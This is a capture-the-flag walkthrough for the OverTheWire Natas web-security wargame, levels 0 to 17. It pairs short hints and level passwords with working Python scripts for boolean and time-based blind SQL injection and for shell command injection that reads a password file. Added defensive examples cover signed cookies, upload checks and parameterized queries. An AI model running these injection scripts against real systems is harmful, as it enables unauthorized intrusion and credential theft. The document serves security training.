natas_levels

Level 0

Password is in the comments.

Level 1

Open the inspector with its keyboard shortcut (the page blocks the context menu) and remove the oncontextmenu attribute from the body tag.

Level 2

Viewing the source shows a files/pixel.png element on the page, which implies a files/ directory on the server. Open that directory and read the file it contains.

Level 3

Open robots.txt and see which folder is disallowed. Web crawlers read this file to learn which folders not to index, so it also tells a reader where to look.

Level 4

Change the Referer header: point the browser at a local proxy and rewrite the request in mitmproxy.

Level 5

Change the cookie the same way: route the browser through a local proxy and edit the cookie in mitmproxy.

Level 6

The PHP source includes a file that holds the secret word needed to reveal the password.

Level 7

Check the HTML. A comment names the page that holds the password; pass that name as the query value in the URL to view it.

Level 8

Check the PHP source they provide. Decode the hexadecimal to a string, reverse it, and base64 decode the result.

Level 9

Comment out the rest of the query and grep the file that holds the password, since the input goes unsanitized into passthru.

Level 10

Same as before: the filter does not block the asterisk, the period, or forward slashes.

Level 11

base64 decode the data cookie and XOR it with the known default data to recover the XOR key. With the key, change the value to yes, encrypt it again, and send the result as the cookie.
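The weakness behind this level, as an added Python example that is not part of this write-up or the wargame: repeating-key XOR hands its key to anyone who knows the plaintext, which is why the cookie can be rewritten, and a keyed MAC is the usual fix. KEY, DEFAULT_DATA and the server secret are constructed stand-ins, not the level's real values.

```python
import base64
import hashlib
import hmac
from typing import Optional

# Constructed stand-ins for the level's values, not the real ones.
KEY = b"qw8J"                                      # hypothetical repeating XOR key
DEFAULT_DATA = b'{"show":"no","color":"#ffffff"}'  # plaintext every visitor gets

def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR plaintext is the key stream; collapse it to its shortest
    repeating period (a key that itself repeats cannot be told apart from the
    shorter key it repeats)."""
    stream = xor_crypt(ciphertext, known_plaintext)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream

def sign_cookie(data: bytes, secret: bytes) -> str:
    """Defensive alternative: send the data in the clear with an HMAC-SHA256 tag."""
    tag = hmac.new(secret, data, hashlib.sha256).hexdigest()
    return base64.b64encode(data).decode() + "." + tag

def verify_cookie(cookie: str, secret: bytes) -> Optional[bytes]:
    """Return the data only if the tag matches; any edit to the data yields None."""
    try:
        encoded, tag = cookie.split(".", 1)
        data = base64.b64decode(encoded, validate=True)
    except ValueError:
        return None
    expected = hmac.new(secret, data, hashlib.sha256).hexdigest()
    return data if hmac.compare_digest(tag, expected) else None

def tamper(cookie: str) -> str:
    """Edit the data half of a signed cookie while keeping the old tag."""
    encoded, tag = cookie.split(".", 1)
    data = base64.b64decode(encoded).replace(b'"no"', b'"yes"')
    return base64.b64encode(data).decode() + "." + tag

def demo() -> tuple:
    """Key recovery from one XOR cookie, and rejection of a tampered HMAC cookie."""
    cookie = xor_crypt(DEFAULT_DATA, KEY)
    signed = sign_cookie(DEFAULT_DATA, b"server-secret")
    return recover_key(cookie, DEFAULT_DATA), verify_cookie(tamper(signed), b"server-secret")
```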

Level 12

Create a .php file that cats the password file. Edit the HTML form so it submits a .php filename instead of .jpg, send it, and open the uploaded file in the browser.

Level 13

Prepend the JPEG magic bytes to the raw hexdump of the file, then upload it.
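A server-side upload check that closes both bypasses above (Level 12's renamed extension and Level 13's prepended magic bytes), as an added Python example rather than the level's PHP: the client's filename is never trusted, the content must carry a JPEG signature, and the stored name is generated server-side with a fixed .jpg extension. The function names and the sample byte strings are constructed for this example; the upload directory must additionally be one the web server never executes scripts from.

```python
import os
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"   # start-of-image marker, all a magic-byte check looks at

# Constructed sample uploads, not real files.
REAL_JPEG = JPEG_MAGIC + b"\xe0" + b"\x00" * 16
PHP_RENAMED = b"<?php /* script body */ ?>"   # Level 12: only the extension was changed
POLYGLOT = JPEG_MAGIC + PHP_RENAMED           # Level 13: magic bytes prepended

def looks_like_jpeg(content: bytes) -> bool:
    """The level's kind of check. Necessary but not sufficient: anything may
    follow the three magic bytes, which is exactly the Level 13 bypass."""
    return content.startswith(JPEG_MAGIC)

def stored_name_for(client_filename: str, content: bytes) -> str:
    """Pick the server-side filename for an upload, or raise if it is not a JPEG.
    The client's filename, and therefore its extension, is never used: the
    server generates a random name and forces .jpg, so a JPEG/PHP polyglot is
    stored under a name the web server serves as an image rather than executes."""
    if not looks_like_jpeg(content):
        raise ValueError(f"rejected {client_filename!r}: no JPEG signature")
    return secrets.token_hex(16) + ".jpg"

def save_upload(client_filename: str, content: bytes, upload_dir: str) -> str:
    """Write the upload under its server-chosen name and return the path."""
    path = os.path.join(upload_dir, stored_name_for(client_filename, content))
    with open(path, "xb") as fh:   # xb: never overwrite an existing file
        fh.write(content)
    return path

def demo() -> dict:
    """Outcome for each sample: the stored extension, or 'rejected'."""
    results = {}
    for label, name, data in [("jpeg", "photo.jpg", REAL_JPEG),
                              ("renamed", "page.php", PHP_RENAMED),
                              ("polyglot", "page.php", POLYGLOT)]:
        try:
            results[label] = stored_name_for(name, data)[-4:]
        except ValueError:
            results[label] = "rejected"
    return results
```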

Level 14

Comment out the rest of the SQL query after the username.

Level 15

#!/usr/bin/env python3
# Boolean-based blind SQL injection: the page only reports whether a user
# "exists", so the password is recovered one character at a time by asking
# whether its prefix equals the characters found so far plus one more guess.
import requests

url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

password = ""
position = 1  # length of the prefix being tested

found = True
while found:
    found = False
    for c in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": 'natas16" and SUBSTR(password, 1, '
                + str(position)
                + ')="'
                + password
                + c
            },
        )
        if "exists" in r.text:
            found = True
            position += 1
            password += c
            print("password:", password, flush=True)
            break  # prefix extended; restart the alphabet for the next position

print("password:", password)

Level 16

#!/usr/bin/env python3
# Command injection through the search needle: the level hands the needle to
# grep inside a shell command, so $(...) is executed. The inner grep's output
# is appended to the needle; when the inner grep matches, the needle no longer
# matches the dictionary and "Africans" disappears from the response.
import requests
import string

url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V"

characters = string.ascii_letters + string.digits

default_needle = "Africans"  # a word that is in the dictionary

# Pass 1: which characters occur anywhere in the password?
password_chars = ""

print("chars = ", end="")

for c in characters:
    r = requests.get(
        url,
        auth=(auth_username, auth_password),
        params={
            "needle": default_needle + "$(grep " + c + " /etc/natas_webpass/natas17)"
        },
    )
    if default_needle not in r.text:
        password_chars += c
        print(c, end="", flush=True)

print()
print("password chars = ", password_chars)

# Pass 2: extend the known prefix one character at a time (anchored with ^),
# stopping once no candidate character extends it any further.
password = ""

found = True
while found:
    found = False
    for c in password_chars:
        r = requests.get(
            url,
            auth=(auth_username, auth_password),
            params={
                "needle": default_needle
                + "$(grep ^"
                + password
                + c
                + " /etc/natas_webpass/natas17)"
            },
        )
        if default_needle not in r.text:
            password += c
            print(password)
            found = True
            break

print("password:", password)

A POST request can also be used for this.
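The hardening side of this level, as an added Python example rather than the level's PHP: the needle is checked against an allowlist and then passed to grep as one element of an argument vector, so no shell ever sees it and `$(...)` is never expanded. The word list is constructed in a temporary directory; `grep` is assumed to be on PATH.

```python
import os
import re
import subprocess
import tempfile

# Dictionary words only: no $, (, ), quotes, backticks or whitespace get through.
NEEDLE_RE = re.compile(r"[A-Za-z]{1,64}")

def validate_needle(needle: str) -> str:
    """Allowlist the needle before it goes anywhere near a command."""
    if not NEEDLE_RE.fullmatch(needle):
        raise ValueError(f"rejected needle {needle!r}")
    return needle

def grep_dictionary(needle: str, dictionary_path: str) -> list:
    """Case-insensitive fixed-string search, like the level's grep -i, but run
    as an argument vector: no shell is involved, so $(...) in the needle would
    reach grep as literal bytes rather than being executed. The allowlist
    above stops such input even earlier."""
    proc = subprocess.run(
        ["grep", "-i", "-F", "--", validate_needle(needle), dictionary_path],
        capture_output=True, text=True, check=False,  # exit status 1 just means no match
    )
    return proc.stdout.splitlines()

def make_dictionary() -> str:
    """Write a small constructed word list and return its path."""
    path = os.path.join(tempfile.mkdtemp(), "dictionary.txt")
    with open(path, "w") as fh:
        fh.write("African\nAfricans\nafter\nafternoon\n")
    return path

def demo() -> dict:
    """A normal search succeeds; a needle carrying $(...) never reaches grep."""
    path = make_dictionary()
    out = {"plain": grep_dictionary("After", path)}
    try:
        grep_dictionary("After$(true)", path)
        out["injected"] = "ran"
    except ValueError:
        out["injected"] = "rejected"
    return out
```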

Level 17

#!/usr/bin/env python3
# Time-based blind SQL injection: this level reveals nothing about the query
# result, so each guess asks MySQL to sleep(6) when the prefix matches and the
# response time is the only oracle.
import requests

url = "http://natas17.natas.labs.overthewire.org"
auth_username = "natas17"
auth_password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"

characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

password = ""
position = 1  # length of the prefix being tested

found = True
while found:
    found = False
    for c in characters:
        uri = url + "?debug=true"
        r = requests.get(
            uri,
            auth=(auth_username, auth_password),
            params={
                "username": 'natas18" and IF(SUBSTR(password, 1, '
                + str(position)
                + ')="'
                + password
                + c
                + '", sleep(6), FALSE) and username = "natas18'
            },
        )
        print("Letter", c, r.elapsed.total_seconds())
        if r.elapsed.total_seconds() > 6:
            found = True
            position += 1
            password += c
            print("password:", password, flush=True)
            break  # prefix extended; restart the alphabet for the next position

print("password:", password)

Basically a timing attack: the response delay is the only signal.
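The query shape behind Levels 15 and 17 and its fix, as an added Python example rather than the level's PHP, with an in-memory SQLite table standing in for the MySQL users table: the concatenated query lets a Level 15-shaped boolean probe answer questions about another column, while the bound-parameter version treats the same input as merely an unknown username. The table rows and the probe text are constructed; SQLite has no sleep(), so Level 17's time-based variant is not reproduced, but its fix is the same parameterisation.

```python
import sqlite3

# Constructed stand-in for the level's users table, not real Natas data.
ROWS = [("natas16", "Abc123xyz"), ("natas17", "Q9rTuvWx01")]

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return db

def user_exists_vulnerable(db: sqlite3.Connection, username: str) -> bool:
    """The level's pattern: the request parameter is spliced into the SQL text,
    so a quote inside it closes the string and the rest is parsed as SQL.
    (Single quotes here because SQLite, unlike MySQL, treats double quotes as
    identifier quoting by default.)"""
    sql = "SELECT * FROM users WHERE username='" + username + "'"
    return db.execute(sql).fetchone() is not None

def user_exists_safe(db: sqlite3.Connection, username: str) -> bool:
    """Bound parameter: the driver passes the input as data, never as SQL, so
    the whole probe string is just a username nobody has."""
    row = db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchone()
    return row is not None

def probe(guess: str) -> str:
    """A Level 15-shaped boolean probe: true only if the password starts with guess.
    (Level 17 wraps the same comparison in IF(..., sleep(6), FALSE) instead.)"""
    return "natas16' AND SUBSTR(password, 1, " + str(len(guess)) + ")='" + guess

def demo() -> dict:
    """The same probe against both query styles."""
    db = make_db()
    return {
        "vulnerable_right_prefix": user_exists_vulnerable(db, probe("Ab")),
        "vulnerable_wrong_prefix": user_exists_vulnerable(db, probe("Ax")),
        "safe_right_prefix": user_exists_safe(db, probe("Ab")),
        "safe_real_user": user_exists_safe(db, "natas16"),
    }
```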


  • natas 8: a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB
  • natas 11: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
  • natas 12: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG
  • natas 14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP
  • natas 16: TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
  • natas 18: 8nEduUXg8kFGPV84uLWvzKgn6oKjq6aq